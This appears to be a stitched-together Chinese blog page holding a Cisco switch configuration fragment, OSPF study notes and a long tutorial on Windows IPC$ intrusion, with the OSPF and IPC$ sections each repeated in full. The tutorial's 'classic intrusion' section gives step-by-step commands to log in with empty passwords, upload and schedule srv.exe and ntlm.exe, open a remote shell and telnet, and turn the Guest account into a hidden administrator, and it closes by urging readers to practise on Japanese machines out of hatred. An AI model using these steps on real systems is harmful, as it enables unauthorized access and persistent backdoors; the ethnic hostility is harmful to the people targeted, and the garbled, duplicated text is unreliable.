interface FastEthernet0/11
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/12
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 204
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/14
switchport access vlan 205
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/15
switchport access vlan 205
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/16
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/17
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/18
switchport access vlan 206
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/19
switchport access vlan 207
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/
20
switchport access vlan 207
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/21
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/22
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/29
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
!
interface FastEthernet0/30
switchport access vlan 208
switchport mode access
no ip address
spanning-tree portfast
。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。
!
interface GigabitEthernet0/1
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
channel-group 1 mode on
!
interface GigabitEthernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk
no ip address
channel-group 1 mode on
!
interface Vlan1
ip address xxxxxxxxx
no ip redirects
standby 1 ip xxxxxxx
standby 1 priority 120
standby 1 preempt
!
interface Vlan200
ip address xxxxxxxxx
!
interface Vlan201
ip address xxxxxxxxx
!
interface Vlan202
ip address xxxxxxxxx
no ip redirects
standby 202 ip xxxxxxxxx
standby 202priority 120
standby 202 preempt
!
interface Vlan203
ip address xxxxxxxxx
no ip redirects
standby 203 ip xxxxxxxxx
standby 203priority 120
standby 203 preempt
!
interface Vlan204
ip address xxxxxxxxx
no ip redirects
standby 204 ip xxxxxxxxx
standby 204priority 120
standby 204 preempt
!
interface Vlan205
ip address xxxxxxxxx
no ip redirects
standby 205 ip xxxxxxxxx
standby 205priority 120
standby 205 preempt
router eigrp
network xxxxxxx
no auto-summary
ip classless
end
OSPF经验总结
最近调了一个ATM - Frame Relay网,中间用OSPF,做了一个域,原以为很EASY,但路由总起不来,SH IP OSPF NEI,发现NEI总不能FULL,查看配置,也没错,后用DEBUG,原来是ATM FRAME-RELAY的报文MTU值不一样,设成一样即可。
**OSPF是支持无类IP地址的,所以大家经常用.192/.252等掩码的地址.这样就很容易在写反码的时候产生错误.
1\注意子网掩码的反码要写对
2\注意所有的端口起来时才可以加OSPF路由
3\area域一定要相同
4\注意hello和dead时间要两端匹配
** OSPF的基本操作
OSPF的基本操作
1、所接的路由器要成为邻居(通过发送Hello Packet来交换);
2、构建邻接关系
(1)并不是所有的邻居都会构建成邻接关系,一般有一个值班路由器,其他的路由器和它构建邻接关系;
(2)一旦构建了邻接关系后,发送LSA(链路状态申明)到邻接路由器。
3、在邻接路由器之间发送LSA;
4、接受LSA;
5、构建一个相同的拓扑表(链路状态数据库);
6、使用最短路径优先的方法来计算最短路径;
7、构建路由表。
**OSPF在广播网络中的操作
OSPF在广播网络中的操作
一、所连的路由器要成为邻居
1、通过Hello协议,每隔一定时间间隔(Hello Interval)(在广播网络中,该间隔是10秒),发送Hello Packet。
2、Hello Packet 的目标地址是:224.0.0.5(代表所有OSPF的路由器);
3、Hello Packet的参数:
(1)Router ID 路由器标识符(用IP地址标识);
a.选择最高的接口IP地址来标识自己;
b.当有Loopback接口时,选择最高的Loopback接口的IP地址作为Router ID;
c.建议在OSPF Router中都建立一个Loopback接口,并配之以IP Address来作为该Router的Router ID。
(2)Area ID区域标识;
a.来标识该路由器所处的位置;
b.只有在同一区域(有相同的Area ID)的Router才会构建邻居;
(3)Hello Interval is 10 seconds;
(4)Dead Interval is 4*Hello Interval=40 sec
(5)验证密码;
(6)Stub Area Flag 末端区域标志。
二、构建邻接关系
1、通过Hello Packet选择一个DR(值班路由器);
(1)先看接口的优先级;
(2)优先级相同时,选择Router ID高的Router作为DR.
2、还要选择一个BDR(备份值班路由器)
如果DR is down,则BDR会成为DR,然后重新选择BDR。
3、非DR和BDR的Router是Other Routers
DR,BDR和Other Routers之间是如何构建邻接邻接关系的:
DR-otherDR;
DR-otherBDR;
DR BDR。
三、链路状态数据库同步
1、Down State
没有OSPF运行。
2、Initial State
开始发送Hello Packet。
3、Two Way State
在后续的Hello Packet中互相发现对方的邻居列表
4、Exstart State
准备建立邻接,确定Master and Slave
5、Exchange State
首先有Master开始发送DBD(Summary LSDB)
6、Loading State
发送LSR(Link State Request)
接受LSU(Link State Update)
7、Full State
Link State DB Sync 链路状态数据库同步
四、计算路由
1、用SPF(最短路径优先)方法计算;
2、以Cost值进行选择。
五、维护路由信息
1、LSU Send:224.0.0.6(指DR和BDR);
2、由DR flood to 224.0.0.5(Other Routers);
3、Update LinkState DataBase;
4、Use SPF Calculated all routing。
**OSPF是支持无类IP地址的,所以大家经常用.192/.252等掩码的地址.这样就很容易在写反码的时候产生错误.
1\注意子网掩码的反码要写对
2\注意所有的端口起来时才可以加OSPF路由
3\area域一定要相同
4\注意hello和dead时间要两端匹配
** OSPF的基本操作
OSPF的基本操作
1、所接的路由器要成为邻居(通过发送Hello Packet来交换);
2、构建邻接关系
(1)并不是所有的邻居都会构建成邻接关系,一般有一个值班路由器,其他的路由器和它构建邻接关系;
(2)一旦构建了邻接关系后,发送LSA(链路状态申明)到邻接路由器。
3、在邻接路由器之间发送LSA;
4、接受LSA;
5、构建一个相同的拓扑表(链路状态数据库);
6、使用最短路径优先的方法来计算最短路径;
7、构建路由表。
**OSPF在广播网络中的操作
OSPF在广播网络中的操作
一、所连的路由器要成为邻居
1、通过Hello协议,每隔一定时间间隔(Hello Interval)(在广播网络中,该间隔是10秒),发送Hello Packet。
2、Hello Packet 的目标地址是:224.0.0.5(代表所有OSPF的路由器);
3、Hello Packet的参数:
(1)Router ID 路由器标识符(用IP地址标识);
a.选择最高的接口IP地址来标识自己;
b.当有Loopback接口时,选择最高的Loopback接口的IP地址作为Router ID;
c.建议在OSPF Router中都建立一个Loopback接口,并配之以IP Address来作为该Router的Router ID。
(2)Area ID区域标识;
a.来标识该路由器所处的位置;
b.只有在同一区域(有相同的Area ID)的Router才会构建邻居;
(3)Hello Interval is 10 seconds;
(4)Dead Interval is 4*Hello Interval=40 sec
(5)验证密码;
(6)Stub Area Flag 末端区域标志。
二、构建邻接关系
1、通过Hello Packet选择一个DR(值班路由器);
(1)先看接口的优先级;
(2)优先级相同时,选择Router ID高的Router作为DR.
2、还要选择一个BDR(备份值班路由器)
如果DR is down,则BDR会成为DR,然后重新选择BDR。
3、非DR和BDR的Router是Other Routers
DR,BDR和Other Routers之间是如何构建邻接邻接关系的:
DR-otherDR;
DR-otherBDR;
DR BDR。
三、链路状态数据库同步
1、Down State
没有OSPF运行。
2、Initial State
开始发送Hello Packet。
3、Two Way State
在后续的Hello Packet中互相发现对方的邻居列表
4、Exstart State
准备建立邻接,确定Master and Slave
5、Exchange State
首先有Master开始发送DBD(Summary LSDB)
6、Loading State
发送LSR(Link State Request)
接受LSU(Link State Update)
7、Full State
Link State DB Sync 链路状态数据库同步
四、计算路由
1、用SPF(最短路径优先)方法计算;
2、以Cost值进行选择。
五、维护路由信息
1、LSU Send:224.0.0.6(指DR和BDR);
2、由DR flood to 224.0.0.5(Other Routers);
3、Update LinkState DataBase;
4、Use SPF Calculated all routing。
一份详尽的IPC$入侵资料
一唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!二什么是ipc$
IPC$(InternetProcessConnection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.解惑:
1)IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到WindowsNT中的很多DLL函数,所以不能在Windows9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,whatuwant,ucando!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令netshareipc$来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous=DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入netshare
2)删除共享(每次输入一个)
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete
netshared$/delete(如果有e,f,……可以继续删除)
3)停止server服务
netstopserver/y(重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net/)
八相关命令
1)建立空连接:
netuse\\IP\ipc$""/user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
netuse\\IP\ipc$"用户名"/user:"密码"(同样有3个空格)
3)映射默认共享:
netusez:\\IP\c$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令netusez:\\IP\c$
4)删除一个ipc$连接
netuse\\IP\ipc$/del
5)删除共享映射
netusec:/del删除映射的c盘,其他盘类推
netuse*/del删除全部,会有提示要求按y确认
九经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1.C:\>netuse\\127.0.0.1\IPC$""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2.C:\>copysrv.exe\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:\>nettime\\127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4.C:\>at\\127.0.0.111:05srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5.C:\>nettime\\127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。
6.C:\>telnet127.0.0.199
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copyntlm.exe\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8.C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务!
9.Telnet127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:\>netuserguest/active:yes
将对方的Guest用户激活
11.C:\>netuserguest1234
将Guest的密码改为1234,或者你要设定的密码
12.C:\>netlocalgroupadministratorsguest/add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!二什么是ipc$
IPC$(InternetProcessConnection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.解惑:
1)IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到WindowsNT中的很多DLL函数,所以不能在Windows9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,whatuwant,ucando!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令netshareipc$来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous=DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入netshare
2)删除共享(每次输入一个)
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete
netshared$/delete(如果有e,f,……可以继续删除)
3)停止server服务
netstopserver/y(重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net/)
八相关命令
1)建立空连接:
netuse\\IP\ipc$""/user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
netuse\\IP\ipc$"用户名"/user:"密码"(同样有3个空格)
3)映射默认共享:
netusez:\\IP\c$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令netusez:\\IP\c$
4)删除一个ipc$连接
netuse\\IP\ipc$/del
5)删除共享映射
netusec:/del删除映射的c盘,其他盘类推
netuse*/del删除全部,会有提示要求按y确认
九经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1.C:\>netuse\\127.0.0.1\IPC$""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2.C:\>copysrv.exe\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:\>nettime\\127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4.C:\>at\\127.0.0.111:05srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5.C:\>nettime\\127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。
6.C:\>telnet127.0.0.199
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copyntlm.exe\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8.C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务!
9.Telnet127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:\>netuserguest/active:yes
将对方的Guest用户激活
11.C:\>netuserguest1234
将Guest的密码改为1234,或者你要设定的密码
12.C:\>netlocalgroupadministratorsguest/add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
订阅:
博文 (Atom)